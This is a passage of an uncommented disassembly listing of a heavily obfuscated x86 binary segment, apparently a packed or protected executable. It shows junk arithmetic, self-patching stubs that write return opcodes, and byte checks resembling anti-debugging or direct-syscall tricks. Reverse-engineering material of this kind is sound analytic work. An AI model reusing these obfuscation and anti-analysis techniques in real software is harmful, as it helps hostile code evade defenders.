		jz	loc_451148
		jmp	loc_43F07D
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_4582D1:				; CODE XREF: sub_44866A-40B3j
		jb	loc_44C1D3
		jle	sub_456338
; END OF FUNCTION CHUNK	FOR sub_44866A

; =============== S U B	R O U T	I N E =======================================



sub_4582DD	proc near		; CODE XREF: sub_44469A-4267p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C216 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043DB76 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043E1BB SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043EDD2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440898 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441A04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442C69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443494 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00444470 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447A6B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044AF39 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044F75D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004511AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045474E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004549D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004558E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D39 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457408 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004576D3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004595E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004596B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004599A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AAFC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045B539 SIZE 00000005 BYTES

		xchg	edx, [esp+8+var_8]
		pop	edx
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44462D
		jmp	loc_45B539
sub_4582DD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_4582F3:				; CODE XREF: sub_44660F+384j
		jp	loc_43CBAC

loc_4582F9:				; CODE XREF: sub_44660F:loc_4520C8j
		push	7BAC31C6h
		pop	eax
		rol	eax, 12h
		cmp	eax, 0FC45DFEAh
		jmp	loc_452EE3
; END OF FUNCTION CHUNK	FOR sub_44660F

; =============== S U B	R O U T	I N E =======================================



sub_45830D	proc near		; DATA XREF: k2vbe3.d:00459FBDo

; FUNCTION CHUNK AT 00446A89 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446B87 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A1C6 SIZE 00000005 BYTES

		cmp	al, 0A4h
		jz	loc_43DC0D
		jmp	loc_446B87
sub_45830D	endp

; ---------------------------------------------------------------------------

loc_45831A:				; CODE XREF: k2vbe3.d:loc_45AA51j
		pop	edx
		lea	eax, sub_44FDAC
		mov	byte ptr [eax],	0C3h
		jmp	sub_44FDAC
; ---------------------------------------------------------------------------
		push	ecx
		push	0F0FF7FC5h
		pop	ecx
		and	ecx, 434F26A3h
		cmp	ecx, 67292B92h
		jmp	loc_44EE6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442D04

loc_458341:				; CODE XREF: k2vbe3.d:0043D7E9j
					; sub_442D04:loc_450E21j
		call	sub_45C041
; END OF FUNCTION CHUNK	FOR sub_442D04
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_458346:				; CODE XREF: sub_44DCF5-175Aj
		jmp	loc_43CDFB
; END OF FUNCTION CHUNK	FOR sub_44DCF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_45834B:				; CODE XREF: sub_440C94+116j
		jmp	loc_440223
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
		jo	loc_4517AB
		jmp	sub_43C03A
; ---------------------------------------------------------------------------

loc_45835B:				; DATA XREF: sub_448DD4+1030Fo
		mov	dword ptr [ebp-18h], 0

loc_458362:				; CODE XREF: k2vbe3.d:004505D9j
		mov	eax, [ebp-14h]
		mov	eax, [eax+20h]
		add	eax, [ebp-4]
		jmp	loc_43FA80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_458370:				; CODE XREF: sub_4467A1-47E2j
		rol	eax, 7
; END OF FUNCTION CHUNK	FOR sub_4467A1
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_458373:				; CODE XREF: sub_43F7AC-1E02j
		jmp	loc_44E3CB
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_458379:				; CODE XREF: sub_43FF90+13028j
		jmp	loc_457590
; END OF FUNCTION CHUNK	FOR sub_43FF90

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45837E	proc near		; CODE XREF: sub_44D9A7-5062p
					; sub_4529D2+48F8j
		push	edi
		mov	edi, ebp
		xchg	edi, [esp+0]
		mov	ebp, esp
		jmp	loc_452EE9
sub_45837E	endp

; ---------------------------------------------------------------------------
		and	ebp, 0FDAE9572h
		jmp	loc_44111D
; ---------------------------------------------------------------------------

loc_458396:				; CODE XREF: k2vbe3.d:loc_44A5F1j
		add	esi, 400D803h
		mov	[esi], eax
		pop	esi
		lea	eax, sub_459AEA
		mov	byte ptr [eax],	0C3h
		jmp	loc_44A082

; =============== S U B	R O U T	I N E =======================================



sub_4583AD	proc near		; CODE XREF: sub_410A9C+78p
					; sub_4583AD+5j
					; DATA XREF: ...
		call	sub_4583B8
		jmp	ds:off_41E0AC
sub_4583AD	endp


; =============== S U B	R O U T	I N E =======================================



sub_4583B8	proc near		; CODE XREF: sub_441850+20j
					; sub_44E8E0:loc_442100j ...

; FUNCTION CHUNK AT 00442A9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443DB7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446E1B SIZE 00000003 BYTES

		call	sub_43EBB1

loc_4583BD:				; CODE XREF: sub_44DB59:loc_43EEF9j
					; k2vbe3.d:0043EF13j
		add	eax, 0E32CBEEh
		add	eax, ebp
		add	eax, 0F6ECF00Eh
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_446E1B
		jmp	loc_442A9D
sub_4583B8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_4583DB:				; CODE XREF: sub_44660F-841Aj
		pop	ecx
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jb	loc_4520A4
		sub	al, 99h
		jmp	loc_450E17
; END OF FUNCTION CHUNK	FOR sub_44660F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448113

loc_4583EE:				; CODE XREF: sub_448113:loc_456305j
		add	edx, esp
		rol	edx, 5
		mov	[ebp+var_4], edx
		cmp	[ebp+var_8], 0
		jmp	loc_448B2D
; END OF FUNCTION CHUNK	FOR sub_448113
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442053

loc_4583FF:				; CODE XREF: sub_442053-53E3j
		add	edi, 0F6115125h
		shr	ecx, 14h
		adc	eax, 58358EF1h

loc_45840E:				; CODE XREF: sub_442053:loc_44C148j
		mov	eax, [ebp-4]
		call	sub_43FEF8
; END OF FUNCTION CHUNK	FOR sub_442053
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_458416:				; CODE XREF: sub_44D298+91B9j
		jmp	loc_44ADE1
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_45841B:				; CODE XREF: sub_44416D+102F1j
		jmp	loc_459445
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------

loc_458420:				; CODE XREF: k2vbe3.d:0045391Dj
		jmp	loc_45353E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_458425:				; CODE XREF: sub_454EDD:loc_44D666j
					; sub_4461D5+13447j
		ja	loc_447216
		jmp	loc_442225
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------

loc_458430:				; CODE XREF: k2vbe3.d:loc_44E40Cj
		add	ecx, ebp
		jle	loc_44D28C
		jmp	loc_44DDBD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_45843D:				; CODE XREF: sub_44DAF6:loc_45B122j
		jnz	loc_4434F4
		jmp	loc_453EA4
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_458448:				; CODE XREF: sub_43D0A9+6AC3j
		jb	loc_448D26

loc_45844E:				; CODE XREF: sub_43D0A9+184F8j
		add	ebx, 33923FCDh
		mov	[ebx], eax
		push	offset sub_4425EA
		jmp	nullsub_435
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_458460:				; CODE XREF: sub_44E503:loc_447DEEj
		test	ebx, 20000h
		jmp	loc_449055
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------
		sub	ebx, 989F456Ah
		not	edx
		jmp	sub_44642C
; ---------------------------------------------------------------------------

loc_458478:				; CODE XREF: k2vbe3.d:00454629j
		add	ecx, ebp

loc_45847A:				; CODE XREF: k2vbe3.d:0045461Dj
		add	ebx, 460471BBh
		mov	[ebx], eax
		push	offset sub_4537DB
		jmp	loc_45532C
; ---------------------------------------------------------------------------

loc_45848C:				; CODE XREF: k2vbe3.d:004513FEj
		push	0D26AEFCh
		pop	ebx
		rol	ebx, 0Eh
		xor	ebx, 0D23FDEF3h
		or	ebx, 187F0FE0h
		cmp	ebx, 3291AB57h
		jmp	loc_456D6D
; ---------------------------------------------------------------------------

loc_4584AC:				; CODE XREF: k2vbe3.d:00453BBAj
		sub	esi, 0A6859A23h
		add	esi, 91E5C9D9h
		mov	[esi], eax
		pop	esi
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_4584BC:				; CODE XREF: sub_43EEC6+14j
		jmp	loc_44C8B3
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_4584C1:				; CODE XREF: sub_44BB73-E8D3j
		rol	eax, 19h
		jmp	loc_44E292
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_4584C9:				; CODE XREF: sub_448A7D+9C3Aj
		mov	ebp, eax
		xchg	ebp, [esp+0]
		ror	eax, 1Bh
		push	esi
		jmp	loc_451AA7
; END OF FUNCTION CHUNK	FOR sub_448A7D
; ---------------------------------------------------------------------------

loc_4584D7:				; CODE XREF: k2vbe3.d:loc_458931j
		jz	loc_446DF3
		jmp	loc_44C17F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_442. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457B59

loc_4584E3:				; CODE XREF: sub_457B59:loc_457B73j
		jmp	sub_44367E
; END OF FUNCTION CHUNK	FOR sub_457B59
; ---------------------------------------------------------------------------
		jmp	ds:off_41E07C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_4584EE:				; CODE XREF: sub_43ED1F:loc_43F018j
					; sub_449067:loc_4460E0j ...
		jz	loc_44F73A
		pop	edx
		mov	eax, [esp+0]
		push	edx
		push	ecx
		push	33A879DCh
		jmp	loc_44449E
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_458504:				; CODE XREF: sub_457580+Bj
		jz	loc_4496B0
		jmp	loc_4561E3
; END OF FUNCTION CHUNK	FOR sub_457580

; =============== S U B	R O U T	I N E =======================================



sub_45850F	proc near		; DATA XREF: sub_44662B+D5D5o
		xchg	edi, [esp+0]
		jmp	sub_44ADEC
sub_45850F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454639

loc_458517:				; CODE XREF: sub_454639-15DEDj
		test	esi, 800h
		jmp	loc_43F2A7
; END OF FUNCTION CHUNK	FOR sub_454639
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_458522:				; CODE XREF: sub_43EEC6:loc_45A09Ej
		xor	esi, 0B05CF390h
		add	esi, 0B8B52BE2h

loc_45852E:				; CODE XREF: sub_45A323-25B5j
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43F704
		jmp	loc_44C814
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------

loc_458541:				; DATA XREF: sub_441409+6E4Ao
		add	eax, 0BB8B27EAh
		mov	[ebp-8], eax
		mov	eax, offset dword_44710C
		push	edi
		push	58923884h
		pop	edi
		or	edi, 31B99004h
		add	edi, 7E7A0A8Ch
		jmp	loc_44B809
; ---------------------------------------------------------------------------
		sbb	eax, esi
		test	eax, ecx
		jmp	loc_448FA6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_458570:				; CODE XREF: sub_447664:loc_44BD00j
		and	ebx, 8DFF3F56h
		add	ebx, 77A94F82h
		xchg	ebx, [esp+0]
		jmp	loc_445EA1
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
		jmp	ds:off_41E09C
; ---------------------------------------------------------------------------

loc_45858A:				; CODE XREF: k2vbe3.d:00450FC2j
		jmp	loc_44F0C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_45858F:				; CODE XREF: sub_447664:loc_445EA1j
					; k2vbe3.d:00446EE4j ...
		pop	edx
		jz	loc_44BFE0
		jmp	loc_43ED67
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
		mov	[edx], ecx
		sub	ebp, 0C490F6B3h
		jmp	sub_45AF0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1C4

loc_4585A8:				; CODE XREF: sub_44F1C4:loc_447405j
		or	eax, 0DE79CA00h
		call	sub_44A53A
; END OF FUNCTION CHUNK	FOR sub_44F1C4
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_4585B3:				; CODE XREF: k2vbe3.d:loc_443EF0j
					; sub_43DFE1+1BEFFj
		jmp	loc_456412
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_4585B8:				; CODE XREF: sub_444297+585j
		push	edi
		ror	edi, 1Ch
		jmp	loc_44AED6
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_4585C1:				; CODE XREF: sub_44F20A:loc_43E130j
		mov	eax, [ebp-4]
		cmp	word ptr [eax],	2ECDh
		jz	loc_4585D4
		jmp	loc_44DBEC
; ---------------------------------------------------------------------------

loc_4585D4:				; CODE XREF: sub_44F20A+3EC4j
					; sub_44F20A+93BFj
		jz	loc_43E4FF
		mov	eax, [ebp-4]
		jmp	loc_44D0E6
; END OF FUNCTION CHUNK	FOR sub_44F20A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_128. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445047

loc_4585E3:				; CODE XREF: sub_445047+3j
		jmp	loc_446D98
; END OF FUNCTION CHUNK	FOR sub_445047
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4585E8:				; CODE XREF: sub_44B2D7+3BD2j
		shl	edx, 1Dh
		test	ecx, ebp
		jmp	loc_43EAAF
; END OF FUNCTION CHUNK	FOR sub_44B2D7

; =============== S U B	R O U T	I N E =======================================



sub_4585F2	proc near		; DATA XREF: sub_45A323-BAFo

; FUNCTION CHUNK AT 0044011D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447568 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D20 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E689 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454084 SIZE 00000006 BYTES

		cmp	byte ptr [eax],	0F1h
		jnz	loc_45408F
		jmp	loc_447568
sub_4585F2	endp

; ---------------------------------------------------------------------------

loc_458600:				; CODE XREF: k2vbe3.d:loc_45C1AAj
		call	sub_4489E3
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_458605:				; CODE XREF: sub_44BB73+B11Ej
		jmp	nullsub_328
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458019

loc_45860A:				; CODE XREF: sub_458019-1533Dj
		jmp	nullsub_279
; END OF FUNCTION CHUNK	FOR sub_458019
; ---------------------------------------------------------------------------
		test	edx, 1F5BA3FEh
		jmp	loc_43E020
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432B0

loc_45861A:				; CODE XREF: sub_4432B0+BC9Cj
		push	edx
		push	7E82857Fh
		pop	edx
		or	edx, 36A3A3BCh
		xor	edx, 3379781Fh
		jmp	loc_452596
; END OF FUNCTION CHUNK	FOR sub_4432B0
; ---------------------------------------------------------------------------

loc_458632:				; CODE XREF: k2vbe3.d:0043EA52j
					; k2vbe3.d:0045A496j
		xor	ebx, 0FF2E9FFEh
		add	eax, ebx
		push	offset sub_449312
		jmp	locret_4429C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444944

loc_458644:				; CODE XREF: sub_444944+AF40j
					; DATA XREF: sub_449661+4794o
		mov	ds:off_41E154, eax
		lea	eax, sub_4440E5
		mov	byte ptr [eax],	0C3h
		jmp	sub_4440E5
; END OF FUNCTION CHUNK	FOR sub_444944

; =============== S U B	R O U T	I N E =======================================



sub_458658	proc near		; CODE XREF: sub_406110+247p
					; sub_406110+2A2p ...

; FUNCTION CHUNK AT 0043F9E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FDA1 SIZE 00000006 BYTES

		call	sub_44FDAC
		jmp	loc_43F9E4
sub_458658	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C68E

loc_458662:				; CODE XREF: sub_43C68E+A4EDj
					; sub_43C68E:loc_451CA7j
		lea	eax, [ebp-14h]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		call	sub_448D3A
		jmp	loc_43ED99
; END OF FUNCTION CHUNK	FOR sub_43C68E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_458675:				; CODE XREF: sub_44B2D7+9C9Cj
		add	ecx, 0E132C167h
		xchg	ecx, [esp+14h+var_14]
		jmp	loc_451DB3
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
		call	sub_4440CA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_322. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_458689:				; CODE XREF: sub_453347+B9Aj
		jmp	loc_45A928
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_45868E:				; CODE XREF: sub_44416D+Aj
		jmp	sub_44867C
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C067

loc_458693:				; CODE XREF: sub_43C067+Dj
		jmp	loc_44000A
; END OF FUNCTION CHUNK	FOR sub_43C067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_458698:				; CODE XREF: sub_454E83+242Aj
		pop	esi
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jo	loc_45450C
		call	sub_43F34C
; END OF FUNCTION CHUNK	FOR sub_454E83
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_4586A9:				; CODE XREF: sub_44945C+9D30j
		rol	eax, 1Ch
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		retn
; END OF FUNCTION CHUNK	FOR sub_44945C

; =============== S U B	R O U T	I N E =======================================



sub_4586B3	proc near		; CODE XREF: sub_44FA5A+4p
					; sub_4530DF:loc_4522D4p

; FUNCTION CHUNK AT 0045523B SIZE 00000005 BYTES

		push	edi
		jmp	loc_45523B
sub_4586B3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_4586B9:				; CODE XREF: sub_44DB59:loc_453CE8j
		jnz	loc_45909D
		jmp	loc_450731
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
		mov	dword ptr [ebp-4], 1
		push	0E7EFE822h
		pop	eax
		xor	eax, 5B3E1B8Bh
		sub	eax, 71F3D006h
		xor	eax, 46F6C5C8h
		jmp	loc_450C58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4586E8:				; CODE XREF: sub_4424CF-3E5Aj
		add	edx, 730ED75Fh
		mov	edx, [edx]
		mov	[edx], eax
; END OF FUNCTION CHUNK	FOR sub_4424CF
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_4586F2:				; CODE XREF: sub_454E69:loc_4405C4j
					; sub_44F028-9FA0j ...
		add	dword ptr [ebp-18h], 4

loc_4586F6:				; CODE XREF: k2vbe3.d:loc_443A2Aj
		inc	dword ptr [ebp-20h]
		jmp	loc_43C79C
; END OF FUNCTION CHUNK	FOR sub_454E69

; =============== S U B	R O U T	I N E =======================================



sub_4586FE	proc near		; CODE XREF: sub_454BF9:loc_43DEC9p
					; k2vbe3.d:00443B7Dj

; FUNCTION CHUNK AT 0044D7BC SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0D8415A66h
		pop	eax
		add	eax, 6E933776h
		and	eax, 0B12B23E7h
		xor	eax, 973AE671h
		and	eax, 0F8386ED8h
		jmp	loc_44D7BC
sub_4586FE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_458725	proc near		; CODE XREF: sub_44863D+14p
					; k2vbe3.d:0045BD9Cj

; FUNCTION CHUNK AT 00440374 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004411B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C34 SIZE 00000014 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xor	ebx, 0DC3BE711h
		xor	eax, ebx

loc_458731:				; CODE XREF: k2vbe3.d:loc_451D8Bj
		pop	ebx
		push	ebx
		pushf
		jmp	loc_455C34
sub_458725	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453F17

loc_458739:				; CODE XREF: sub_453F17+Aj
		jnz	loc_4507FC

loc_45873F:				; CODE XREF: sub_449312:loc_45719Cj
		jmp	loc_44AFDF
; END OF FUNCTION CHUNK	FOR sub_453F17
; ---------------------------------------------------------------------------

loc_458744:				; CODE XREF: k2vbe3.d:004436ECj
		mov	esi, [eax]

; =============== S U B	R O U T	I N E =======================================



sub_458746	proc near		; CODE XREF: k2vbe3.d:004551D9p
		xchg	edi, [esp+0]
		pop	edi
		push	eax
		ror	eax, 0Ah

loc_45874E:				; CODE XREF: sub_4426F8:loc_44980Aj
		push	edi
		push	8268CC75h
		jmp	loc_448656
sub_458746	endp

; ---------------------------------------------------------------------------

loc_458759:				; DATA XREF: sub_44945C-BDE6o
		push	esi
		mov	esi, ecx
		xchg	esi, [esp]
		mov	[ebp-4], eax
		call	sub_45234F
		jmp	loc_451BAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_45876C:				; CODE XREF: sub_43FA2C+40FCj
		jz	loc_44F1ED
		jmp	loc_4414E0
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_458777:				; CODE XREF: sub_45000F:loc_447C85j
		mov	eax, ds:dword_440988
		or	eax, eax
		jnz	loc_45A2E7
		jmp	loc_45721C
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B495

loc_45878A:				; CODE XREF: sub_44B495-7D4Cj
		xchg	esi, [ecx]
		mov	ebx, [eax]
		jbe	loc_451164

loc_458794:				; CODE XREF: k2vbe3.d:0044F2C2j
		jg	loc_44379F

loc_45879A:				; CODE XREF: k2vbe3.d:004448A2j
		jmp	loc_44A2F9
; END OF FUNCTION CHUNK	FOR sub_44B495
; ---------------------------------------------------------------------------

loc_45879F:				; CODE XREF: k2vbe3.d:004544E1j
		push	ecx
		mov	esp, ebp
		xchg	ecx, [esp]
		mov	ebp, ecx
		jmp	loc_44D1B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_399. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4587AD:				; CODE XREF: sub_43CCD0+20Fj
		jmp	loc_4547C3
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_4587B2:				; CODE XREF: sub_448D7F:loc_453830j
		jnz	loc_440E1A

loc_4587B8:				; CODE XREF: k2vbe3.d:0044F15Ej
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_4587BD:				; CODE XREF: sub_446CCF+12j
		jmp	loc_43C2C8
; END OF FUNCTION CHUNK	FOR sub_446CCF
; ---------------------------------------------------------------------------
		rol	ecx, 1Eh
		xchg	esi, ebx
		and	edi, 59BA02AEh
		push	edi
		jmp	loc_440E1A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_485. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4587D4:				; CODE XREF: k2vbe3.d:00457292j
		jmp	loc_4533B4
; ---------------------------------------------------------------------------

loc_4587D9:				; CODE XREF: k2vbe3.d:00454F5Ej
		jmp	sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C248

loc_4587DE:				; CODE XREF: sub_43C248+10j
		jmp	loc_45B739
; END OF FUNCTION CHUNK	FOR sub_43C248
; ---------------------------------------------------------------------------

loc_4587E3:				; CODE XREF: k2vbe3.d:0043DD6Cj
		rol	edx, 3
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_4587E6:				; CODE XREF: sub_44B94B+F8FCj
		xor	eax, 0FC0B4EB3h
		or	eax, 81D94396h
		sub	eax, 1C3F6DE5h
		xor	eax, 703840DFh
		add	eax, ebp
		add	eax, 5936CCh
		jmp	loc_44EDE7
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_45880B:				; CODE XREF: sub_44921C:loc_45B290j
		or	edi, 925F7AB1h
		sub	edi, 262F5F4Ch
		add	edi, 6793458Dh
		xchg	edi, [esp+0]
		jmp	loc_442755
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A992

loc_458825:				; CODE XREF: sub_44A992+10j
		and	ebx, 9E610A36h
		xor	ebx, 9C1BE085h
		add	ebx, 7229330Fh
		popf
		jmp	loc_447A85
; END OF FUNCTION CHUNK	FOR sub_44A992
; ---------------------------------------------------------------------------

loc_45883D:				; CODE XREF: k2vbe3.d:00442DBBj
		jl	loc_457C9A
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_458843:				; CODE XREF: sub_448D7F+7375j
		shr	esi, 9

loc_458846:				; CODE XREF: k2vbe3.d:loc_442DADj
		add	edi, 352B7544h
		mov	[edi], eax
		push	offset sub_4490B2
		jmp	loc_444FB9
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_458858:				; CODE XREF: sub_4424CF+DC1Aj
		cmp	esi, 0E6CFD2AFh
		jmp	loc_44FC56
; END OF FUNCTION CHUNK	FOR sub_4424CF

; =============== S U B	R O U T	I N E =======================================



sub_458863	proc near		; CODE XREF: k2vbe3.d:loc_4597A8j
					; DATA XREF: sub_459798+6o
		call	sub_4414DA
		call	sub_44A641
sub_458863	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_45530F

loc_45886D:				; CODE XREF: sub_45530F:loc_44F4AEj
					; sub_45530F-515Aj
		mov	eax, [ebp-18h]
		mov	eax, [eax+24h]
		push	offset loc_451A03
		jmp	loc_447977
; END OF FUNCTION CHUNK	FOR sub_45530F
